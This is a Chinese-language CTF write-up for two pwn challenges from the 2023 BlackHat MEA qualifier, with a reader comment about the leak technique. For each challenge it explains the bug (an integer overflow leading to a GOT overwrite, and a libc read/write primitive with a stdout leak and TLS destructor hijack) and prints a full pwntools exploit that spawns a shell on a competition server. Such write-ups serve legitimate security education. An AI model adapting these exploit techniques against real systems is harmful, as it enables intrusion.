2023 BlackHat MEA Qualification CTF Pwn Writeup

没听说过的国外赛,总共就两题pwn

题目虽然简单,但是漏洞点还是很少见的

Profile

employ.age部分存在整型溢出,可以溢出修改后方employ.name指针

任意地址写,写got表,把free修改为main地址达到多次循环写,然后配合后面的exit,再把free写为system

注意控制字节数,避免在getline末尾触发realloc导致crash

EXP:

from pwn import*
r=remote("54.78.163.105",31530)
#r=process('./profile')
context.log_level='debug'

r.recv()
r.sendline(str(0x4040187FFFFFFF))
r.recv()
r.sendline("\x8c\x13\x40")


r.recv()
r.sendline(str(0x4040687FFFFFFF))
r.recv()
r.sendline("\x8c\x13\x40")


r.recv()
r.sendline(str(0x4040187FFFFFFF))
r.recv()
r.sendline("\x20\x11\x40")


r.recv()
r.sendline(str(0x7FFFFFFF))
r.recv()
r.sendline("%49$p;")

r.recvuntil("----------------\n")
r.recvuntil("----------------\n")
libc_base=int(r.recvuntil(";",drop=True),16)-0x2ce40
success("libc_base: "+hex(libc_base))


r.recv()
#gdb.attach(r,"b getdelim")
r.sendline(str(0x4040187FFFFFFF))
r.recv()
r.sendline(p64(libc_base+0x53d60))


r.recv()
r.sendline(str(0x7FFFFFFF))
r.recv()
r.sendline("/bin/sh")

r.interactive()

Memstream

程序带upx壳,直接工具脱壳

看似是一个bss段的任意地址读写,但是pie和relro保护全开

这是返回调试带壳的程序,发现由于自解压的性质,程序的所有段在mmap出的地址空间中

这就意味着bss段和libc的偏移是固定的,因此变成了一个libc任意地址读写

stdout泄漏libc地址,然后修改tls和tls_dtor_list劫持exit流程的__call_tls_dtors即可

EXP:

from pwn import*
r=remote("54.78.163.105",30916)
#r=remote("127.0.0.1",5000)
#r=process('./memstream')
context.log_level='debug'

def seek(offset):
	r.recvuntil("> ")
	r.sendline("1")
	r.recvuntil(": ")
	r.sendline(str(offset))

def write(size,content):
	r.recvuntil("> ")
	r.sendline("3")
	r.recvuntil(": ")
	r.sendline(str(size))
	r.recvuntil(": ")
	r.send(content)

write(0x8,"a"*0x8)

seek(-0x528e0)
write(0x8,p64(0xfbad1800))

seek(-0x528b8)
write(0x1,"\x10")
r.recv(5)

libc_base=u64(r.recv(8))-0x21ba70
success("libc_base: "+hex(libc_base))

seek(-0x26f8f0)
write(0x8,p64(0))


seek(-0x26f8f0-0x88)
write(0x8,p64(libc_base+0x26d060))

libc=ELF("./libc.so.6")

seek(0)
write(0x10,p64(((libc_base+libc.sym["system"])<<0x11)&0xFFFFFFFFFFFFFFFF)+p64(libc_base+libc.search("/bin/sh").next())) r.recvuntil("> ")
r.sendline("4")

r.interactive()
解压密码均为flagyard

附件下载

评论

  1. MrNobody
    1 年前
    2023-10-25 13:48:39

    Hello sir , i hope you doing well , i want to know how you leaked the address ? what you did exactly ?

    • 博主
      MrNobody
      1 年前
      2023-10-26 19:07:19

      Leak address by modifying _IO_2_1_stdout_ structure. Modify _flags to 0xfbad1800 and change _IO_write_base to a smaller value. and it will output the structure itself when next printf function execute.

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇